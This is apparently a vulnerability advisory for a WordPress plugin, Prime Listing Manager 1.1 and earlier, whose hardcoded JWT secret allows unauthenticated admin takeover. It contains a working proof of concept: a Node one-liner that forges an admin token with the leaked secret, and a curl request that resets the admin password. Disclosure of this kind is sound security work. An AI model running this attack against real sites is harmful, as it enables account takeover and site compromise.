Prime Listing Manager <= 1.1 – Unauthenticated Privilege Escalation | CVE 2025-14892

Description

The plugin allows an attacker to gain administrative access without having any kind of account on the targeted site and perform unauthorized actions due to a hardcoded secret.

Proof of Concept

Use a Node script to generate a JWT:

node -e "const c=require('crypto');const b=u=>Buffer.from(JSON.stringify(u)).toString('base64').replace(/=+$/,'').replace(/\+/g,'-').replace(/\//g,'_');const h={alg:'HS256',typ:'JWT'};const now=Math.floor(Date.now()/1000);const p={iat:now,exp:now+3600,data:{id:ID_NUMBER_HERE,username:'USER_NAME_HERE'}};const H=b(h),P=b(p);const S=c.createHmac('sha256','ilovewordpress').update(H+'.'+P).digest('base64').replace(/=+$/,'').replace(/\+/g,'-').replace(/\//g,'_');console.log(H+'.'+P+'.'+S)"

Replace "ID_NUMBER_HERE" with an admin User ID and "USER_NAME_HERE" with a User Name.

Once you have the JWT, run the following command:

curl -s -X POST "http://example.com/wp-json/primlima/v1/user/change-password" \
    -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE3NjYwNzE1NjcsImV4cCI6MTc2NjA3NTE2NywiZGF0YSI6eyJpZCI6MTUsInVzZXJuYW1lIjoiYWRtaW5wcmltZSJ9fQ.q_gDN-DZuGow_xBhHgtqZJ7JW8m8wAKWwzH48c42PGA" \
    -H "Content-Type: application/json" \
    -d '{"new_password":"Nxploited!2025"}'

You will then be able to log in using the username when you created the JWT and the reset password: Nxploited!2025